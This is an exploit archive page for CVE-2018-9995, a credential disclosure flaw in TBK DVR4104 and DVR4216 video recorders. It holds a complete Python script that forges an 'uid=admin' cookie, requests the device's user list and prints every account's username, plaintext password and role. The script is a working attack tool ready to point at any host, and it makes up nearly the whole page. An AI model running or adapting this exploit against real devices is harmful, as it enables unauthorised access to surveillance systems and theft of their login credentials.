what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

TBK DVR4104 / DVR4216 Credential Disclosure

TBK DVR4104 / DVR4216 Credential Disclosure
Posted May 4, 2018
Authored by Fernandez Ezequiel

TBK DVR4104 and DVR4216 suffer from a credential disclosure vulnerability.

tags | exploit, info disclosure
advisories | CVE-2018-9995
SHA-256 | 332240b12a3af3cba5b8e90a990438e0ddb78ba79a43d0fe883dddca9109c2b3

TBK DVR4104 / DVR4216 Credential Disclosure

Change Mirror Download
# -*- coding: utf-8 -*- 
import json
import requests
import argparse
import tableprint as tp

class Colors:
BLUE = '\033[94m'
GREEN = '\033[32m'
RED = '\033[0;31m'
DEFAULT = '\033[0m'
ORANGE = '\033[33m'
WHITE = '\033[97m'
BOLD = '\033[1m'
BR_COLOUR = '\033[1;37;40m'

banner = '''
__..--.._
..... .--~ ..... `.
.": "`-.. . .' ..-'" :". `
` `._ ` _.'`"( `-"'`._ ' _.' '
~~~ `. ~~~
.'
/
(
^---'


[*] @capitan_alfa
'''

details = '''
# Exploit Title: DVRs; Credentials Exposed
# Date: 09/04/2018
# Exploit Author: Fernandez Ezequiel ( @capitan_alfa )
'''
parser = argparse.ArgumentParser(prog='getDVR_Credentials.py',
description=' [+] Obtaining Exposed credentials',
epilog='[+] Demo: python getDVR_Credentials.py --host 192.168.1.101 -p 81',
version="1.1")

parser.add_argument('--host', dest="HOST", help='Host', required=True)
parser.add_argument('--port', dest="PORT", help='Port', default=80)

args = parser.parse_args()

HST = args.HOST
port = args.PORT

headers = {}

fullHost_1 = "http://"+HST+":"+str(port)+"/device.rsp?opt=user&cmd=list"
host = "http://"+HST+":"+str(port)+"/"

print Colors.GREEN+banner+Colors.DEFAULT


def makeReqHeaders(xCookie):
headers["Host"] = host
headers["User-Agent"] = "Morzilla/7.0 (911; Pinux x86_128; rv:9743.0)"
headers["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
headers["Accept-Languag"] = "es-AR,en-US;q=0.7,en;q=0.3"
headers["Connection"] = "close"
headers["Content-Type"] = "text/html"
headers["Cookie"] = "uid="+xCookie

return headers

try:
rX = requests.get(fullHost_1,headers=makeReqHeaders(xCookie="admin"),timeout=10.000)
except Exception,e:
print Colors.RED+" [+] Timed out\n"+Colors.DEFAULT
exit()

badJson = rX.text
try:
dataJson = json.loads(badJson)
totUsr = len(dataJson["list"]) #--> 10
except Exception, e:
print " [+] Error: "+str(e)
print " [>] json: "+str(rX)
# print " [>] Reuest: \n"+str(makeReqHeaders(xCookie="admin"))
exit()


print Colors.GREEN+"\n [+] DVR (url):\t\t"+Colors.ORANGE+str(host)+Colors.GREEN
print " [+] Port: \t\t"+Colors.ORANGE+str(port)+Colors.DEFAULT

print Colors.GREEN+"\n [+] Users List:\t"+Colors.ORANGE+str(totUsr)+Colors.DEFAULT
print " "

final_data = []
try:
for obj in range(0,totUsr):

temp = []

_usuario = dataJson["list"][obj]["uid"]
_password = dataJson["list"][obj]["pwd"]
_role = dataJson["list"][obj]["role"]

temp.append(_usuario)
temp.append(_password)
temp.append(_role)

final_data.append(temp)

hdUsr = Colors.GREEN + "Username" + Colors.DEFAULT
hdPass = Colors.GREEN + "Password" + Colors.DEFAULT
hdRole = Colors.GREEN + "Role ID" + Colors.DEFAULT

cabeceras = [hdUsr, hdPass, hdRole]

tp.table(final_data, cabeceras, width=20)

except Exception, e:
print "\n [!]: "+str(e)
print " [+] "+ str(dataJson)

print "\n"

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close